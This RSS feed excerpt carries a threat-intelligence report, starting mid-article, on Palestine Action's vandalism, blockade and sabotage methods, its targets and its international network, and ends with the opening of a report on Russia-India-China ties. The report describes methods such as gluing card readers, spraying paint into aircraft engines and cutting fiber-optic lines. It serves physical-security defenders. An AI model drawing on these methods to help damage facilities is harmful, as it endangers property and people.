          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_10e806cffcc88b90ce3d873718b05e1904a5c2fb0.png?width=750&amp;format=png&amp;optimize=medium" width="934" height="502" />
        </p>
        <p><em><strong>Figure 3</strong>: Evidence of vandalism TTPs from a February 2025 Palestine Action attack against an Allianz insurance office in Milton Keynes, UK (Source: Palestine Action)</em></p>
        <h4>Obstruction</h4>
        <p>Palestine Action operations have also used physical obstruction as a TTP to prevent access to targeted facilities. Unlike other attack TTPs associated with Palestine Action, the group has often used methods of obstructing facilities that are very unlikely intended to maintain the covert nature of the operation. Specifically, in some operations, Palestine Action cells have physically obstructed access to targeted facilities by forming a human blockade: sitting down, interlocking arms, blocking access to a main doorway, and on occasion chaining themselves together or to an immovable object (such as a vehicle or post). In a break from the patterns of other observed Palestine Action TTPs, activists have attempted blockades during normal business hours, mainly to prevent facility employees from entering the premises.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1c0b3ea7939281ba6720a594996ce304846f148cf.png?width=750&amp;format=png&amp;optimize=medium" width="800" height="450" />
        </p>
        <p><em><strong>Figure 4:</strong></em> <em>Palestine Action activists blockade a Lockheed Martin facility in Bedfordshire, UK, in a November 2023 protest (Source:</em> <em><a href="https://www.bbc.com/news/uk-england-beds-bucks-herts-67519517">BBC</a>)</em></p>
        <p>Palestine Action network groups — particularly in the United States (US) — have also experimented with more novel methods of facility obstruction that can be covertly conducted. Cells with a nexus to the US-based Palestine Action offshoot Unity of Fields (UoF), for instance, launched a campaign in the summer and fall of 2024 to target Citibank automated teller machine (ATM) locations in the New York and Los Angeles metropolitan areas due to the bank’s perceived support of Israeli interests. In addition to vandalizing the facilities, the cells inserted epoxy and affixed cement-glue stickers to exterior card-reader devices that were necessary to enter the facilities. Palestine Action’s instructional guide also calls for activists to use concrete to plug water or sewage pipes leading to targeted facilities, although Insikt Group has not observed Palestine Action operatives using this TTP.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_13c10409dc1a57c4f5f1e968bab131a61780ca022.png?width=750&amp;format=png&amp;optimize=medium" width="675" height="900" />
        </p>
        <p><em><strong>Figure 5:</strong></em> <em>Activists insert epoxy into a Citibank card reader in New York City on October 7, 2024 (Source: Unity of Fields)</em></p>
        <h4>Sabotage</h4>
        <p>Sabotage operations remain the most likely of the TTPs historically employed by Palestine Action to impose serious financial costs on the victims of its operations. While almost certainly relying on low-tech and low-sophistication methods, Palestine Action has caused millions of dollars in damages through sabotage operations, mainly to technology and other assets inside targeted facilities. In previous incidents, cells linked to Palestine Action have relied on the same toolkit used for vandalism and obstruction — large, blunt objects like crowbars and wrenches and fire extinguishers filled with paint — to sabotage their target. Activists almost certainly prefer these tools due to their low cost, ease of use, minimal profile, and the inability to trace their purchase; their use across the spectrum of Palestine Action’s TTPs likely suggests that activists are opportunistic, employing the toolkit in sabotage operations as opposed to vandalism or obstruction when they can exploit vulnerabilities in facility security.</p>
        <p>The most notable and recent sabotage incident connected to Palestine Action was the aforementioned breach of RAF Brize Norton, the largest RAF base in the UK, on June 20, 2025. A video of this attack posted by the group <a href="https://www.bbc.com/news/videos/czxwvp7lykko">shows</a> activists approaching Airbus A330s on the base using electric scooters. They damaged the aircraft by spraying red paint through a fire extinguisher directly into the plane’s engines and striking the plane with crowbars. The attack caused approximately £7 million ($9.4 million) in damages to the aircraft, almost certainly <a href="https://covertaccessteam.substack.com/p/the-raf-brize-norton-breach-what">due</a> to the impact of the attack on sensitive parts and equipment inside the planes’ engines. The attack on RAF Brize Norton <a href="https://www.reuters.com/business/aerospace-defense/four-pro-palestinian-activists-charged-over-uk-military-base-break-in-2025-07-03/">led</a> to the arrest and indictment of five Palestine Action-linked activists and almost certainly prompted the UK terrorism designation of the group, as well as improvements to facility and perimeter security at the RAF base.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1c315d371b4cb1477f8fe5f99e66778bb49f47d21.png?width=750&amp;format=png&amp;optimize=medium" width="465" height="262" />
        </p>
        <p><em><strong>Figure 6:</strong></em> <em>Palestine Action activists approach aircraft at RAF Brize Norton on electric scooters (Source: Palestine Action)</em></p>
        <p>Palestine Action activists also deployed sabotage TTPs on several additional operations targeting defense contractors in the UK. In August 2024, a Palestine Action cell in Bristol <a href="https://www.reuters.com/world/uk/nine-deny-attack-israeli-firm-elbits-uk-warehouse-2025-01-17/">breached</a> an Elbit warehouse by piloting a van through perimeter fencing, entered the facility, and began sabotaging internal equipment within the facility with sledgehammers, axes, and other blunt instruments. In total, the operation <a href="https://www.reuters.com/world/uk/nine-deny-attack-israeli-firm-elbits-uk-warehouse-2025-01-17/">caused</a> over £1 million ($1.3 million) in damages; protesters also allegedly assaulted a security guard and law enforcement officers responding to the incident, prompting JTAC to <a href="https://static01.nyt.com/newsgraphics/documenttools/c8fe6a933eb1bb7b/70535e60-full.pdf">label</a> the attack as an “act of terrorism.” During a June 1, 2022, incident at a Thales Group facility in Glasgow, Palestine Action activists <a href="https://www.bbc.com/news/articles/c9wj144zd7po">accessed</a> the roof and entered the facility, destroying parts used for submarines with blunt instruments. In conjunction with the sabotage operation, two protesters glued themselves to the roof, likely attempting to obstruct access to the facility.</p>
        <h3>Targets</h3>
        <p>Palestine Action’s <a href="https://newleftreview.org/sidecar/posts/tactics-of-disruption">primary target</a> in the UK has almost certainly been Elbit: the global defense contractor has been the most frequent victim of its attacks, the group’s propaganda and instructional material list Elbit as the group’s preferred target, and Palestine Action has launched branded campaigns designed specifically to encourage activists to attack Elbit facilities. As secondary targets, the group has <a href="https://static01.nyt.com/newsgraphics/documenttools/c8fe6a933eb1bb7b/70535e60-full.pdf">conducted</a> notable attacks against other public and private sector defense entities perceived to have some association with the Israeli military, namely the UK’s Ministry of Defence (MoD), Teledyne Technologies, Thales Group, Leonardo, and Rafael Advanced Defense Systems. According to its 2023 announcement and its post-October 7, 2023, activity, the group and its international network consider a range of entities in sectors that reportedly supply goods or services to Elbit or the Israeli military — including banks, financial institutions, insurance agencies, real estate brokers, accounting firms, human resources contractors, and international shipping and logistics companies — as legitimate targets for militant direct action. Direct actions have also <a href="https://static01.nyt.com/newsgraphics/documenttools/c8fe6a933eb1bb7b/70535e60-full.pdf">targeted</a> other UK government entities, including the UK Foreign and Commonwealth Office, the BBC, and the London Stock Exchange. Palestine Action almost certainly targets these companies with the goal of inflicting maximum financial and reputational damage through its operations, in order to convince companies to cease their business with Elbit or Israeli entities.</p>
        <p>As the next section demonstrates, the international expansion of Palestine Action network groups adopting the UK branch’s modus operandi or TTPs has almost certainly broadened the range of secondary and tertiary targets that are likely to be affected by militant direct action campaigns. However, Palestine Action and its global network very likely share a focus on specific sectors — defense contracting, banking, insurance, and international shipping and logistics — that relevant groups and cells are likely to target regardless of their respective area of operations. Moreover, the TTPs Insikt Group associates with Palestine Action’s UK branch have almost certainly been adopted by its international counterparts, very likely due to the influence of Palestine Action’s militant direct action campaigns in the UK, instructional material, and training sessions for activists.</p>
        <h2>Palestine Action’s Global Network</h2>
        <p>Palestine Action’s global network consists of groups of activists around the world who share Palestine Action UK’s commitment to disrupting the normal business operations of entities partnered with the State of Israel through militant direct action. Some of these groups refer or have referred to themselves explicitly as “Palestine Action”; have direct relationships to the UK branch through their members, partners, or benefactors; choose identical targets, such as Elbit; or, like Palestine Action UK, are solely motivated by the anti-Israel cause. Others, despite lacking these relationships, have directly appropriated Palestine Action UK’s TTPs, targets, or other aspects of the organization to support their own operations.</p>
        <p>We classify groups in Palestine Action’s global network based on which elements they share in common with the UK branch. As depicted in <strong>Table 1</strong>, our four-part classification labels Palestine Action network groups as either Palestine Action <strong>franchises</strong>, <strong>affiliates</strong>, <strong>offshoots</strong>, or <strong>partners</strong>, depending on whether they share areas of operation, motivating ideology, TTPs, or targets with the UK branch. These categories are not static and are subject to change over time, particularly as groups founded as Palestine Action franchises outside the UK adapt to the local landscape in their own countries and form their own brand. Table 1 additionally contains examples of each of the four categories of Palestine Action network groups, with the following subsections containing case studies of particularly notable franchise, affiliate, offshoot, and partner groups.</p>
        <div>
          <div>
            <div><strong>Label</strong></div>
            <div><strong>Nexus</strong></div>
            <div><strong>Distinction</strong></div>
            <div><strong>Examples</strong></div>
          </div>
          <div>
            <div><strong>Franchise</strong></div>
            <div>Ideology, TTPs, targets</div>
            <div>Area of operation</div>
            <div>Palestina Libera (Italy), Palestine Action Germany, Palestine Action Sweden, Palestine Action Eire (Ireland), Palestine Action Belgium, Palestine Action NL, Palestine Action Norway, Palestine Action Canada, Palestine Action Group Canberra (Australia), Palestine Action Tunisia</div>
          </div>
          <div>
            <div><strong>Affiliate</strong></div>
            <div>Ideology, TTPs</div>
            <div>Area of operation, targets</div>
            <div>Death to Toll (Australia)</div>
          </div>
          <div>
            <div><strong>Offshoot</strong></div>
            <div>Ideology, targets</div>
            <div>Area of operation, TTPs</div>
            <div>Unity of Fields (US), Shut Elbit Down (Germany/Austria)</div>
          </div>
          <div>
            <div><strong>Partner</strong></div>
            <div>Area of operation, TTPs</div>
            <div>Ideology, targets</div>
            <div>Shut the System (UK)</div>
          </div>
        </div>
        <p><em><strong>Table 1:</strong></em> <em>Classification of Palestine Action global network groups (Source: Insikt Group)</em></p>
        <h3>Franchise: Palestine Action Italia/Palestina Libera (Italy)</h3>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_122ef6d2b5fa1ff9c7d344d1035840e3cfe5798d2.png?width=750&amp;format=png&amp;optimize=medium" width="606" height="115" />
        </p>
        <p><em><strong>Figure 7:</strong></em> <em>Palestine Action Italia logo (Source: Palestine Action Italia)</em></p>
        <p>Palestine Action Italia, more commonly known as Palestina Libera, is Palestine Action’s Italy-based franchise. On its website, the group directly identifies itself as “the Italian branch of the international ‘Palestine Action’ campaign, which in England directly led to the closure of three arms factories involved in the genocide in Gaza.” The group also uses similar branding as the UK branch, employs similar TTPs, and targets the same sectors, focusing largely on defense contractors with facilities in Italy. In particular, Palestina Libera’s direct actions have frequently targeted the Italy-based defense contractor Leonardo at its offices throughout the country, due to its joint ventures with Elbit.</p>
        <p>The organization very likely emerged from pro-Palestinian activist factions in Italy that increasingly aligned with Palestine Action’s global network in the wake of the October 7, 2023, attack. While data in the Recorded Future Platform indicates the group’s website was registered on February 4, 2024, a 2008 <a href="https://badil.org/phocadownload/Badil_docs/publications/al-majdal-38.pdf">issue</a> of al-Majdal Magazine — the quarterly publication of the BADIL Resource Center for Palestinian Residency &amp; Refugee Rights — indicates that the same domain was operated by an Italian pro-Palestinian organization, the Comitato di Solidarietà con il Popolo Palestinese, Torino [Committee for Solidarity with the Palestinian People in Turin, Italy]. Screenshots of the domain captured in the Wayback Machine indicate that between October 2010 and the website’s registration in February 2024, the site displayed a message indicating the administrator should “upload [their] website into the public_html directory.” This message almost certainly indicates that an administrator account was active during the interim, but that it had not uploaded any information onto the domain. The group’s active social media accounts were created in November and December 2023, respectively.</p>
        <p>Following Palestine Action’s July 5, 2025, designation as a terrorist organization in the UK, Palestine Action Italia has likely become one of the organization’s most prioritized franchises. Palestine Action’s main website currently includes a link to donate to Palestina Libera, hosted on Palestina Libera’s website. This donation section uses the service provider Donorbox to facilitate transactions, with options for donors including sending €15 for “a little bit of paint,” €50 for “smoke bombs in action,” €100 for the “legal expenses fund,” or another amount determined by the donor. Palestina Libera has also very likely increased its operational tempo in the wake of the proscription, citing Palestine Action UK’s designation and the arrests of protesters at rallies in the UK as motivation for new direct actions. For instance:</p>
        <ul>
          <li>On October 3, 2025, Palestina Libera took part in pro-Palestine direct actions across Italy, protesting the Israeli government’s interception of the Global Sumud Flotilla. Activists very likely affiliated with Palestina Libera participated in occupations and blockades of major transportation and logistics infrastructure, including <a href="https://www.instagram.com/reel/DPWT8gQjYO9/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">obstructing</a> a runway at Pisa International Airport, <a href="https://www.instagram.com/reel/DPWqPwHDX89/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">occupying</a> several highways in the Tuscany region, and blockading an Amazon Logistics facility in Brandizzo.</li>
          <li>On September 29, 2025, the group <a href="https://www.instagram.com/reel/DPMU7CiDLju/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">claimed</a> to have blockaded a Leonardo facility in the town of Nerviano. In a social media post, it alleged that at least one Leonardo employee working at the facility joined its protest.</li>
          <li>On September 25, 2025, several of the group’s activists <a href="https://www.instagram.com/reel/DPBW13SjC3F/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">chained</a> themselves together outside a Rheinmetall facility in Rome, which they claimed “hindered production” and “made the gate inaccessible for an entire work shift.”</li>
        </ul>
        <h3>Affiliate: Death to Toll (Australia)</h3>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_150556c905aaf15c815e6d439844ade4f10514771.png?width=750&amp;format=png&amp;optimize=medium" width="661" height="416" />
        </p>
        <p><em><strong>Figure 8:</strong></em> <em>Death to Toll logo (Source:</em> <em><a href="https://www.instagram.com/p/DMJ89bkP9FP/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">Instagram</a>)</em></p>
        <p>“Death to Toll” is a campaign by anarchist violent extremists (AVEs) in Australia to conduct vandalism, obstruction, and sabotage against the Australian international logistics and shipping company Toll Group (Toll), its parent organization Japan Post Holdings, and defense contractors working with the Australian Defense Force (ADF), due to accusations that Toll and the ADF are partnering with the Israeli military. The group responsible for this campaign is classified as a Palestine Action affiliate, as it almost certainly shares Palestine Action UK’s ideology and uses TTPs promoted by the group, but operates solely in the Melbourne, Australia area and has chosen its own companies to target.</p>
        <p>The first attack claimed by this group was a <a href="https://www.instagram.com/reel/DCQQoNwNirH/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">sabotage</a> of a Heat Treatment Australia (HTA) facility on October 14, 2024; the campaign against Toll began with an <a href="https://www.instagram.com/p/DDne15_tEvP/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">obstruction</a> of one of the company’s facilities in Melbourne on November 22, 2024. In an August 7, 2025, interview, Death to Toll’s organizers <a href="https://www.sydneycriminallawyers.com.au/blog/everything-is-on-the-table-says-direct-action-group-targeting-toll-holdings-for-driving-genocide/">cited</a> Palestine Action’s targeting of UK shipping organizations that partnered with Elbit as an inspiration for their attacks. They also have shared a copy of Palestine Action’s 2023 instructional guide on their website.</p>
        <p>In recent months, the Death to Toll group has claimed responsibility for several acts of vandalism, obstruction, and sabotage targeting Toll:</p>
        <ul>
          <li>On October 7, 2025, AVEs claimed responsibility for intercepting a Toll fuel truck in Melbourne by obstructing a road with flaming objects. They subsequently spraypainted the truck with red graffiti.</li>
          <li>On August 31, 2025, AVEs <a href="https://www.instagram.com/reel/DO0o6wTD565/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">claimed</a> to have attacked a Toll facility in Dandenong South. A video posted to the group’s Instagram account shows activists smashing exterior glass doors of the facility with a blunt object and dousing them with a flammable liquid in a bottle, very likely gasoline.</li>
          <li>On August 11, 2025, AVEs <a href="https://www.instagram.com/reel/DNPf4cuoxkd/?utm_source=ig_web_copy_link&amp;igsh=MzRlODBiNWFlZA==">claimed</a> to have vandalized a Toll facility in Truganina, writing graffiti, spraying red paint, and damaging keycard access devices on the exterior of the facility. Toll <a href="https://www.jpost.com/diaspora/antisemitism/article-864565">confirmed</a> the attack in a statement to the press, and Victoria Police indicated they were investigating the incident.</li>
        </ul>
        <p>Beyond its website, the Death to Toll campaign operates a social media account and accepts submissions from independent AVEs for claims of responsibility and tips on potentially vulnerable facilities on a Mega file-sharing site and through a Proton Mail email address. The social media pages attributed to the group have frequently used the hashtags #socalledaustralia, #DeathToll, and #TheDeathTollisRising. On the front page of their website, the administrators have posted a call to action against industries in Australia that they perceive to be providing support for the IDF. Specifically, they claim that “all sites and equipment used or owned by Toll Holdings and its parent company, Japan Post, are legitimate targets for anti-genocide action. This includes sabotage, vandalism, blockades, strikes, occupations, and all forms of resistance and disruption. Everything is on the table.”</p>
        <h3>Offshoot: Unity of Fields (United States)</h3>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_18ea20b3f7868e11207e286ab17d6b023d7c636f6.png?width=750&amp;format=png&amp;optimize=medium" width="400" height="400" />
        </p>
        <p><em><strong>Figure 9:</strong></em> <em>Unity of Fields logo (Source:</em> <em><a href="https://x.com/unityoffields">Social Media</a>)</em></p>
        <p>Unity of Fields (UoF) describes itself as an “anti-imperialist propaganda front” that reports on the activities of militant pro-Palestinian activists in the US. In this regard, it functions in a similar fashion to AVE “counter-info” outlets, which provide AVEs in a specified geographic area with information pertaining to upcoming protests and demonstrations, claims of responsibility for AVE attacks, guides and instructional material for carrying out attacks, and communiqués from local AVE groups.</p>
        <p>UoF was almost certainly founded as a Palestine Action franchise in the US: during its initial years of operation, it used the name “Palestine Action US,” was managed by a cell of activists who almost certainly founded the group with <a href="https://therealnews.com/meet-the-activists-fighting-zionism-with-direct-action">insight</a> from Palestine Action UK members, and devoted itself to attacking Elbit facilities in the US using Palestine Action’s standard TTPs.</p>
        <p>From October 7, 2023, to August 2024, Palestine Action US predominantly conducted vandalism, obstruction, and sabotage against Elbit facilities, particularly in Cambridge, Massachusetts, and Merrimack, New Hampshire. Calla Walsh — almost certainly one of Palestine Action US and UoF’s de facto <a href="https://therealnews.com/meet-the-activists-fighting-zionism-with-direct-action">leaders</a> between October 2023 and July 2025 — was arrested and convicted for her role in a November 20, 2023, Palestine Action US <a href="https://www.wmur.com/article/merrimack-new-hampshire-elbit-systems-sentences/62908047">attack</a> on an Elbit facility in Merrimack.</p>
        <p>In August 2024, following Walsh’s release from prison, Palestine Action US announced its rebranding as “Unity of Fields”, appropriating a concept from the Yemeni Houthi movement. The group subsequently renamed its social media and online messenger accounts, launched a new website dedicated to the group’s communiqués and instructional materials, and claimed the group’s new mission was to establish “a militant propaganda front against the US-NATO-zionist axis of imperialism.” In addition to claims of responsibility for attacks, the website also hosts a repository of instructional and ideological material, as well as publications produced by other AVE groups.</p>
        <p>Autonomous pro-Palestinian activists across the US have sent several dozen claims of responsibility to UoF for publication claiming responsibility for operations against an array of targets, including defense contractors (including Magellan Aerospace, Rolls-Royce and MTU America, Lockheed Martin, Ghost Robotics Corporation, Leidos, and Israel Chemicals), banks (including Bank of America, Citibank, Wells Fargo, Chase Bank, and BNY Mellon), shipping and logistics companies (including Maersk and Amazon), US military recruitment centers, law enforcement infrastructure (particularly vehicles), university buildings and officials, public transportation, and construction buildings and equipment. Occasionally, DVEs from outside of the US — including other Palestine Action global network groups — send communiqués to UoF for publication. At the time of writing, the most recent claims of responsibility include:</p>
        <ul>
          <li>An August 7, 2025, communiqué claiming responsibility for an arson of several vehicles at a Lovitt Technologies plant in Melbourne, Australia</li>
          <li>A May 29, 2025, communiqué claiming responsibility for spraypainting several pro-Palestinian messages on a Maersk shipping container in Oakland, California</li>
          <li>A May 9, 2025, communiqué from protesters at the University of Washington that details the occupation of a university building</li>
        </ul>
        <p>UoF has significantly decreased its output of new claims of responsibility since late July 2025, very likely because of internal disputes and a leadership transition within the group. On July 29, 2025, Calla Walsh <a href="https://x.com/callawalsh/status/1950366979233054839">reported</a> on social media that she was “no longer part of” UoF after a dispute over the “direction in which the project is going,” following which Walsh reported “the organization purged me” and that she had “complied with the decision and transferred them ownership of the accounts.” While Insikt Group is unaware of the exact nature of this dispute, Walsh’s departure from UoF directly followed a July 2025 trip she made to Iran, where she <a href="https://x.com/Sobh_festival/status/1945795728795717751">participated</a> in an event hosted by the World Service of the Islamic Republic of Iran Broadcasting (IRIB), Iran’s government-operated media agency. In an October 5, 2025, article on her Substack page, Walsh reported that she had been detained by US Customs and Border Protection (CBP) officers at New York’s John F. Kennedy International Airport following her return from Tehran.</p>
        <h3>Partner: Shut the System (United Kingdom)</h3>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1a8b8e989596e70bc2cae00253a826090b8f15030.png?width=750&amp;format=png&amp;optimize=medium" width="400" height="400" />
        </p>
        <p><em><strong>Figure 10:</strong></em> <em>Shut the System logo (Source:</em> <em><a href="https://x.com/shut_system/photo">Social Media</a>)</em></p>
        <p>Unlike other groups included in this report, which are predominantly motivated by the Palestinian cause, Shut the System is a UK-based environmental violent extremist (EVE) group that likely <a href="https://x.com/money_rebellion">emerged</a> as an offshoot of the UK climate activist group Extinction Rebellion (XR). However, the group has also almost certainly conducted pro-Palestinian direct actions. In addition, Shut the System has also directly collaborated with Palestine Action in the UK, almost certainly due to substantial overlaps between Palestine Action’s and Shut the System’s TTPs, preferred targets, and areas of operation. For instance, Shut the System frequently targets insurers and banks that it claims provide services to major global fossil fuel extraction projects; Palestine Action has also targeted many of the same companies on the grounds that they provide services to the IDF or Israeli government. Both groups also frequently use vandalism with red paint, projectiles, or blunt objects to deface the facade of target properties, as well as sabotage, although Shut the System has very likely deployed more sophisticated methods of infrastructure sabotage than Palestine Action. Overall, Shut the System fits the profile of a Palestine Action partner organization.</p>
        <p>The first reported Shut the System operation <a href="https://realmedia.press/fossil-fuel-insurance-sabotage">took place</a> in late February 2024. During 2024, the group predominantly conducted vandalism targeting the London offices of insurance companies, such as AIG, Probitas 1492, Chubb, Liberty General, Lloyd’s of London, Markel UK, QBE, Tokio Marine, as well as Barclays, using red paint, graffiti, and projectiles. In a January 2025 <a href="https://realmedia.press/fossil-fuel-insurance-sabotage/">communiqué</a>, Shut the System claims to have selected these companies as targets because they were identified in a November 2023 <a href="https://www.insurancebusinessmag.com/us/news/environmental/revealed--top-fossil-fuel-insurers-465650.aspx">article</a> from Insurance Business Magazine as among the top ten insurers of fossil fuel extraction projects in the world. On June 10, 2024, Shut the System and Palestine Action <a href="https://www.bbc.com/news/articles/c1rrzp1qwp1o">conducted</a> a joint, UK-wide operation targeting Barclays bank branches in Birmingham, Bristol, Brighton, Edinburgh, Exeter, Glasgow, Lancashire, London, Manchester, Northampton, Sheffield, and Solihull. Activists from both groups sprayed red paint on the exterior of the branch facilities and smashed their windows with projectiles.</p>
        <p>Subsequently, the group has very likely expanded its targeting aperture to include conservative think tanks, additional financial services providers, and events for defense contractors, posting claims of responsibility for attacks on its websites and social media profiles. Shut the System’s website also contains instructions on how to conduct vandalism, obstruction, and sabotage on behalf of the group, and provides a list of 38 banks and insurance companies that it identifies as priority targets due to their alleged financing of the fossil fuel industry. The group continues to conduct joint operations with a number of UK-based AVE and EVE cells, including cells affiliated with almost certain Palestine Action offshoot groups. For instance, during the past several months, Shut the System claims to have collaborated with pro-Palestinian militant direct action groups during the following operations:</p>
        <ul>
          <li>On October 8, 2025, Shut the System’s “Palestine solidarity faction” and activists from the UK group Palestine Pulse claimed to have used projectiles and blunt instruments to destroy “entrances, glass panels, security cameras and ID card readers” at a Palantir Technologies facility in London. They additionally claimed to have sprayed red paint on the building’s facade.</li>
          <li>On September 29, 2025, Shut the System claimed to have conducted a joint operation with Shut Elbit Down and French and German XR affiliate groups to target Barclays and BlackRock assets throughout the UK and Europe. Activists sprayed red paint outside of Barclays offices in Paris, France, and Hamburg, Germany, and a BlackRock office in Vienna, Austria, and “superglued locks of [Barclays] branches across the UK.” Additionally, Shut the System stated it targeted two Barclays senior executives in the UK by spraying red paint outside of their personal residences, and sending letters to the executives’ neighbors “inviting them to a cocktail party hosted by the [executive] where they can explain why they have no conscience.”</li>
          <li>On September 8, 2025, Shut the System claimed to have severed fiber-optic cables leading to the London offices of Clarion Events, the company <a href="https://www.find-tender.service.gov.uk/Notice/029807-2025?origin=SearchResults&amp;p=2">responsible</a> for hosting the Defence and Security Equipment International (DSEI) defense trade exhibition. It conducted the action as part of a campaign, “Shut DSEI Down,” that aimed to protest the trade exhibition due to the participation of several defense contractors that pro-Palestinian activists argue provide armaments to the IDF.</li>
        </ul>
        <p>From January 2025 onward, Shut the System frequently used a physical attack TTP that we have not observed in the operations of other Palestine Action global network groups, namely, sabotaging communications infrastructure by cutting fiber optics lines. Instructions on Shut the System’s website demonstrate how to identify fiber optic cable boxes outside of target facilities, locate the correct wires, and sever them to disrupt internet and other communications services to the building. Between August 18 and September 31, 2025, Shut the System launched a campaign titled “Summer of Sabotage” in which it encourages activists to use these and other sabotage TTPs to target banks and financial industry entities.</p>
        <h2>Mitigations</h2>
        <p>The decentralized nature of individual Palestine Action cells entails that activists very likely plan operations in closed or encrypted communications channels that are almost certainly inaccessible to individuals who have not established their bona fides with the group. The groups’ official communications announce operations after the fact; they almost certainly will not provide indicators and warnings (I&amp;W) of planned activities.</p>
        <p>To diminish risks from physical threat activities conducted by Palestine Action’s global network, organizations and their physical security teams should focus on mitigating the effects of attacks by implementing the following approaches. Overall, physical security measures should aim to deny Palestine Action operatives interior access to facilities. The most costly attacks perpetrated by the group — including the June 2025 attack on RAF Brize Norton — took place after activists were able to breach secure perimeters, enter facilities, and sabotage assets stored inside perimeters.</p>
        <ul>
          <li>Recorded Future customers can leverage the Recorded Future Intelligence Operations Platform to monitor communications sources connected to Palestine Action and its global network, in order to determine evolutions in trends in targeting and TTPs and an organization’s overall risk level.</li>
          <li>Customers can use the Recorded Future Platform’s Intelligence Cards, Advanced Query Builder, and Insikt Group reporting to track ongoing global events — such as the Israel-Hamas conflict or the status of Palestine Action’s legal battle against its terrorism designation in the UK — that are likely to affect threat actors’ operational tempo and targeting aperture.</li>
          <li>Integrate this report and other Insikt Group assessments of DVE threat actors’ TTP and targeting into structured tabletop exercises for physical security teams.</li>
          <li>Review and, where necessary, implement governmental <a href="https://www.osce.org/secretariat/597756">guidelines</a> for physical protection of business facilities, particularly with regard to electronic surveillance, secure lighting, and security personnel.</li>
          <li>Conduct vulnerability assessments to enable effective contingency and resiliency planning in the event of an incident of vandalism, obstruction, or sabotage, with particular focus on a successful incident disrupting communications, transportation, and energy infrastructure.</li>
          <li>Limit voluntary publication of information about the functions, layout, and location of critical infrastructure assets at facilities, or security measures at a facility, beyond the levels necessary to comply with legal or regulatory requirements.</li>
        </ul>
        <h2>Outlook</h2>
        <p>While Palestine Action’s branch in the UK continues the ongoing legal appeal of its terrorism designation — very likely until the designation is rescinded or all of its legal options are exhausted — Palestine Action’s global network is very likely to escalate the frequency and scope of its militant direct action operations. In the short to medium term, the formation of new Palestine Action global network groups in North America, Western Europe, Australia, and elsewhere around the world is likely, threatening an increased range of organizations in defense contracting, banking, finance, insurance, and shipping and logistics sectors.</p>
        <p>Extant groups linked to Palestine Action are also likely to traverse the various categories of groups described in this report, with cells inside the UK attempting to separate themselves from the Palestine Action brand to avoid legal scrutiny and cells outside the UK highlighting their connections to Palestine Action to build credibility with AVEs and the pro-Palestine activist movement. As such, we expect existing franchises and affiliates in the UK to increasingly become offshoots and partners while the ban is in effect; the reverse is likely in geographic areas outside the UK where Palestine Action is not a designated terrorist organization.</p>
        <p>Volatile dynamics in the Israel-Hamas conflict and the situation in the Gaza Strip are also very likely to influence Palestine Action’s global network in the short to medium term, especially with regard to the frequency of attacks. At the time of writing, a ceasefire between Israel and Hamas, effective October 10, 2025, remains in effect. While the establishment of the ceasefire likely did not stop Palestine Action network groups from conducting operations — several of the groups profiled in this report have carried out attacks in the interim — any potential breakdown in the ceasefire would very likely augur increased Israeli military activity in the Gaza Strip that has historically caused upticks in attacks related to the network.</p>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/research/media_15526186964d3548d60e4a73cf876721d522ad671.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Implications of Russia-India-China Trilateral Cooperation]]></title>
            <link>https://www.recordedfuture.com/research/implications-of-russia-india-china-trilateral-cooperation</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/research/implications-of-russia-india-china-trilateral-cooperation</guid>
            <pubDate>Wed, 10 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Examines Russia-India-China trilateral cooperation, U.S. tariffs and sanctions, why a formal bloc is unlikely, and implications for governments and business.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Insikt Group assesses that the August 2025 meeting of Chinese Communist Party (CCP) General Secretary Xi Jinping, Indian Prime Minister Narendra Modi, and Russian President Vladimir Putin at the Shanghai Cooperation Organization (SCO) Summit likely suggests early interest among the three states to explore trilateral cooperation, though the formation of a resilient bloc remains unlikely.</p>
        <p>United States (US) policy –– particularly the level of sanctions the US places on each country –– is likely one of the primary factors driving the three states to change their level of cooperation. An increase in US sanctions is likely to drive each state to pursue alternative markets; this motivation has led to an acceleration of trilateral cooperation in some areas, and a reduction in others. For example, President Donald Trump’s decision to impose tariffs on India in mid-2025 very likely amplified a warming China-India relationship and reinforced a stable India-Russia relationship. In contrast, US sanctions on Russian oil companies in October 2025 led China and India to decrease their level of Russian oil imports.</p>
        <p>The second factor driving Russia, India, and China to explore trilateral cooperation is very likely their shared strategic interest in a multipolar global order — manifest through fora like SCO and BRICS (Brazil, Russia, India, China, and South Africa).</p>
        <p>However, despite nascent trilateral cooperation, there remains significant divergence among the three countries’ foreign policy goals, governing principles, and economic ambitions, which likely limits the scope of their cooperation. The political, economic, and military dynamics that shape bilateral relationships between China-Russia, China-India, and India-Russia are complex and distinct. Of those relationships, challenges between Beijing and New Delhi are almost certainly the greatest barrier to the formation of a trilateral bloc or alliance. In particular, India’s competition with China for Asia-Pacific regional leadership and influence, a large trade deficit favoring China, and unresolved border disputes will very likely temper the depth of cooperation between the two. All three countries seek to create an alternative center of gravity to the West, but India does not share Russia’s or China’s staunchly anti-Western worldview.</p>
